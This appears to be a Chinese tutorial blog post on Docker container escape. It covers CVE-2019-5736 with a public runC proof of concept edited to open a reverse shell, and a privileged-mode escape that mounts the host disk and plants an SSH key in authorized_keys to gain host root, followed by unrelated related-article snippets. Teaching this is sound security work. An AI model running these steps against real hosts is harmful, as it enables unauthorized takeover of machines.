docker 获取宿主机ip_Docker逃逸在实战中的利用

最新推荐文章于 2023-07-12 22:29:18 发布
最新推荐文章于 2023-07-12 22:29:18 发布
阅读量447 收藏
点赞数
文章标签: docker 获取宿主机ip
Docker是被广泛应用的容器之一,在实际的渗透测试中,可能遇到web目录搭载在docker容器中,这样即使我们获取了web权限,也无法直接对宿主机进行有效控制,这里就需要利用docker逃逸技术来获取宿主机的控制权限,docker逃逸方式很多,此篇主要介绍实战中常用的两种方式。

CVE-2019-5736

漏洞成因:

runC是一个低级容器,像Docker这种高级容器在运行时可以使用runC来处理与其他运行容器之间的任务等。Docker 18.09.2之前的版本中使用的runC版本小于1.0-rc6,攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并重写其二进制文件,从而获取到宿主机的root权限。

漏洞利用:

首先我们需要确定docker版本,因为漏洞执行成功的条件是Docker版本小于18.09.2并且runC版本小于1.0-rc6。Docker版本查询命令:docker –version。

8b4ae1febd6e68cc85bf5542eb82e589.png

Github上有现成的漏洞环境,如果大家需要测试可以去下载和安装,直接执行命令即可下载运行:Curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw-o install.sh && bash install.sh。环境安装好之后我们需要下载漏洞poc:https://github.com/Frichetten/CVE-2019-5736-PoC,下载之后我们需要对main.go 文件内容进行修改。

3f649709759e72f7a0c7edaf5fdd0c59.png

将脚本中该处内容修改为反弹shell的命令,IP为攻击IP,端口为监听端口。然后需要用Go编译生成payload,运行命令:CGO_ENABLED=0GOOS=linux GOARCH=amd64 go build main.go。

471c3ae368b87f7d6b4a00a42a0c2748.png

main文件就是我们生成的payload,我们需要将payload拷贝到docker容器目录下,此时相当于我们已经拿到了docker权限,上传payload后需要赋给其权限:chmod 777 main。然后运行main。

809cbc94012412d8c070359673e6e1fc.png

并且在攻击机启动监听。

1bc7f56bd62b45d1dbe49c4cea7e328a.png

然后就是等待目标启动docker就会执行payload中的命令,等待物理机shell回连。 利用--privileged特权模式逃逸 如果目标机器docker版本不在上面版本影响范围,我们可以利用privileged特权模式逃逸,特权模式在版本0.6时被引入docker,允许容器内的root同时拥有宿主机的root权限。这里我们顺便提一下使用特权模式有什么好处呢,在使用特权模式启动容器时,可以获得很多设备的访问权限,在运行docker run –privileged命令之后,docker容器可以访问宿主机所有设备,并可以执行mount进行挂载。因此,当我们拥有docker容器权限且容器使用特权模式启动,我们可以通过mount命令将外部宿主机磁盘挂载入容器,这样我们就可以访问宿主机的磁盘。 我们可以使用ls /dev命令查询宿主机的设备。

1eea6f5404306c66d144af778e9de88b.png

sda是磁盘设备,我们将其中一个挂载到我们指定的目录,执行命令mount /dev/sda /test,test是我们专门用来挂载设备的目录。再执行命令ls /test,如果挂载成功,则会显示宿主机的磁盘内信息,这样我们访问容器内的/test目录相当于访问宿主机的磁盘。只能访问磁盘的话利用起来并不方便,这里我们结合ssh密钥来获取宿主机的root权限。 我们现在攻击机生成ssh密钥,执行命令ssh-keygen -f test

5598d4d8bbd53540b9c3e9a74041e230.png

给密钥文件赋权限:chmod 600 test 现在我们就要将生成的密钥文件写入目标机器,此时容器内的test目录相当于宿主机的磁盘,我们ls /test/home即可查看目标机器的用户都有哪些,选择一个用户查看,里面会存在.ssh目录,我们需要将密钥写入.ssh目录并将文件命名为authorized_keys(目标机.ssh目录权限必须为700)。依次执行以下两条命令写入密钥文件。 cp -avx /test/home/ubuntu/.ssh/id_rsa.pub/test/home/ubuntu/.ssh/authorized_keysecho '生成的.pub文件的内容' >/hack/home/ubuntu/.ssh/authorized_keys写入完成后,我们就可以用攻击机链接目标机器了,此时我们利用的是自己的私钥所以再用ssh连接就不需要密码可以直接登录目标宿主机。连接命令:ssh -I test ubuntu@192.168.111.130,这样我们就拿到了宿主机的root权限。
weixin_39668890
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
docker小技能:容器IP和宿主IP一致( Nacos服务注册ip为内网ip,导致Fegin无法根据服务名访问 )、Dockerfile
iOS逆向与安全
11-13 512
在 Linux 系统,有两个特殊的进程,一个是 pid 为 1 的 /sbin/init 进程,另一个是 pid 为 2 的 kthreadd 进程,这两个进程都是被 Linux 的上帝进程 idle 创建出来的,其前者负责执行内核的一部分初始化工作和系统配置,也会创建一些类似 getty 的注册进程,而后者负责管理和调度其他的内核进程。容器和镜像的区别就在于,所有的镜像都是只读的,而每一个容器其实等于镜像加上一个可读写的层,也就是同一个镜像可以对应多个容器。镜像: 跨平台、可移植的程序+环境包。
详解如何解决docker容器无法通过IP访问宿主问题
01-10
问题起源 在使用 docker 的过程我不幸需要在 docker 容器访问宿主的 80 端口, 而这个 80 端口是另外一个容器 8080 端口映射出去的. 当我在容器里通过 docker 的网桥 172.17.0.1 访问宿主时, 居然发现: curl: (7) Failed to connect to 172.17.0.1 port 80: No route to host 查找问题原因 可以确定的是容器与宿主是有网络连接的, 因为可以在容器内部通过 172.17.0.1 Ping 通宿主: root@930d07576eef:/# ping 172.17.0.1 P
docker容器内部获取宿主ip地址方法以及报错解决
weixin_43220532的博客
12-09 6222
1,在docker容器内执行以下python代码或根据需要插入到你的.py文件: import paramiko #通过pip3 install paramiko 安装 s = paramiko.SSHClient() s.load_system_host_keys() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect(hostname="A",port=22,username="B"
docker容器获取宿主任意信息
过于丰富,无法简介
11-17 5061
实现思路 通过在运行docker容器的系统安装ssh、sshpass服务,编写ssh连接到宿主脚本,同时携带在宿主需要执行的命令,来达到在容器获取宿主执行命令的返回值的效果。因此这里有一个前提,必须知道宿主的IP地址,如果在执行脚本时不知道宿主IP地址,可以在项目添加一个手动配置宿主IP地址的功能,当然这是要根据功能来定的。 安装ssh服务 lz使用的镜像是centos的官方镜像,具体安装方式可以自行百度 安装ssh服务 yum -y install openssh-server
详解如何获取docker容器(container)的ip地址
09-29
主要介绍了详解如何获取docker容器(container)的ip地址,文通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
docker容器获取宿主IP
m0_67402125的博客
09-01 3009
当以host方式启动时,其实有很大的网络权限,当ip a时,能发现显示宿主的所有网卡及IP。通过环境变量 --env HOST_IP=xxxx,通过环境变量$HOST_IP获取。将主/proc目录挂载到容器(未验证,非安全)定义一个包含ip的文件,映射进容器内(安全)通过ip route获取。...
docker容器如何获取宿主器信息?这样做一步到位
不学习如何码遍天下
02-23 8287
容器这样操作就能获取宿主器信息,让你的应用飞起来,轰轰轰
如何获取docker宿主ip
热门推荐
lz7955823的专栏
10-13 2万+
获取docker宿主ip 本文转自[记录无限:www.gluoo.cn]. 在开发调试过程,很可能遇到类似的情况: 宿主跑着一个DB,不管是MySQL还是MongoDB,总之跑在宿主docker里运行着应用程序,但程序要连宿主的DB时,不知道其IP咋办? 解决方案: alias hostip="ifconfig en0 | grep inet | grep
docker 容器无法通过 IP 访问宿主
shihan175的博客
07-12 3072
原因:这是因为项目与服务都是通过docker容器运行的,而docker 容器无法通过 IP 访问宿主(貌似高版本解决了这个问题),所以导致部署到同一器后出现问题。问题:一次部署项目过程,将Java项目与间件服务部署在同一远程器上,出现连接不上间件服务的问题,而项目在本地运行时是可以连接的,没有问题。也可以通过在容器运行时 加参数--net=host,这个命令让容器与宿主共享网络命名空间,这样容器就可以直接使用宿主的IP地址进行访问。解决:Docker社区有提过该问题已被解决,
Docker 如何分配宿主网段 IP
09-30
本篇文章主要介绍了Docker 如何分配宿主网段 IP,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Docker容器访问宿主网络的方法
09-30
主要介绍了Docker容器访问宿主网络的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
docker容器内部获取宿主网卡ip地址
暴躁的菜鸡的博客
05-12 5383
本案例主要讲解Docker - - bridge网络模式下,容器内部获取宿主网卡ip的方式。这里因为要在容器获取宿主的配置,所以要把这部分的宿主配置挂载到容器。容器不会虚拟出自己网卡,配置自己的主ip等,而是使用宿主的ip和端口。(宿主是centos7,其他系统未测试)
docker容器获取宿主ip地址
目标检测专栏持续更新中,改进YOLO系列通用,适用v5、v7、v8、所有博客均是团队原创博客,所有文章禁止转载,违者必究。
03-31 3712
import paramiko s = paramiko.SSHClient() s.load_system_host_keys() # 密码列表 list1 = ['521999'] for password in list1: try: s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 链接宿主,172.17.0.1为docker虚拟网桥地址,默认为172.17.0.1,可更改 s
Docker容器与宿主器通过IP内外通讯
黑夜开发者的博客
03-23 1万+
例如一个如下场景,在Docker环境下面运行了一个含有PHP环境的Docker容器(container),容器名称为php1,同时在宿主(真实器)上面有一个MySQL服务器,如何来通过,容器内部的PHP程序来访问外部的MySQL呢? 原理:当docker服务启动起来时,宿主器便作为网关的存在与其他Docker容器处在同一个网段内,就像是路由器和各个连接终端之间的关系,宿主就类似于路由...
docker容器的数据卷
m0_60213304的博客
04-24 2234
卷就是文件或者目录,卷的目的就是数据的持久化,独立于容器的生命周期,因此容器删除时,或者容器挂掉了,数据卷依旧存在,可以使用数据卷完成数据的恢复(类似于redis的AOF,RDB); 设置容器卷的命令: docker run -it --privileged=true -v /宿主绝对路径目录:/容器内目录 镜像名(默认可读可写) #--privileged=true 打开root的权限 -v表示绑定一组路径 容器内指定路径下产生的数据,宿主指定路径下也可以获取宿主指定目录下产..
(十二)docker --privileged
ddlcdlzn20146的博客
07-03 1143
1. privileged参数作用 --privileged Give extended privileges to this container 大约在0.6版,privileged被引入docker。 使用该参数,container内的root拥有真正的root权限。 否则,container内的root只是外部的一个普通用...
node-v18.18.2-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
docker访问宿主mysql_Docker 安装WordPress(保姆级教程)
06-09
好的,对于你的问题,我可以给出以下步骤: ...如果你不知道宿主的 IP 地址,可以在宿主上执行以下命令查看: ``` ifconfig ``` 以上就是使用 Docker 安装 WordPress 的步骤,希望能对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值